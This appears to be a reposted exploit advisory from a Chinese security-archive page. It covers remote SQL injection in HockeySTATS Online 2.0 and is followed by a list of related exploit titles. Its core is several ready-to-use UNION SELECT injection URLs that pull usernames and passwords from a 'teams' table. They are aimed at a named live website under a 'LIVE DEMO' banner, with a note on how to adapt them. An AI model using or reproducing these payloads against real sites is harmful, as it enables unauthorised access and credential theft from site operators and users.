HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

摘要：######################################################################...

###############################################################

#################### Viva IslaM Viva IslaM ####################

## Remote SQL injection Vulnerability

## Hockeystats Online V BASIC & ADVANCED ( index.php opt )

###############################################################

## AuTh0r : Mr.SQL

## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f

## Email : SQL@Hotmail.it

## SYRiAN Arab HACkErS

########################

## -[[: L!VE DEMO :]]-

## [[BASIC VERSION]] www.thehockeystop.com/hstatsbasic/?opt=viewpage&type=html&id=-00002' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0 from teams/*

## www.thehockeystop.com/hstatsbasic/index.php?opt=schedule&season=1&divid=-1' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL from teams/*

## [[ADVANCED VERSION]] www.thehockeystop.com/hockeystats/?opt=viewpage&type=html&id=-00002' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0 from teams/*

## www.thehockeystop.com/hockeystats/index.php?opt=schedule&season=1&divid=-1' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL from teams/*

########################

-[[ NOTE ]]-

1 ) In the first exploite you you need set the real id ?opt=viewpage&type=html&id=-< real id >' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0 from teams/*

2 ) Download [[Basic version]] code from here ;D http://www.thehockeystop.com/site/downloads/HSO_basic/HockeySTATS_Basic.zip

#######################################################################################################

-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-

:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::

#######################################################################################################

【HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities】相关文章：

★ Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

★ Maian Events 2.0 Insecure Cookie Handling Vulnerability

★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

★ jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

★ IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

★ tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

★ Joomla Component EZ Store Remote Blind SQL Injection Exploit

★ Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

★ minb 0.1.0 Remote Code Execution Exploit

★ TGS CMS 0.3.2r2 Remote Code Execution Exploit

上一篇： PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

下一篇： Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

学习工具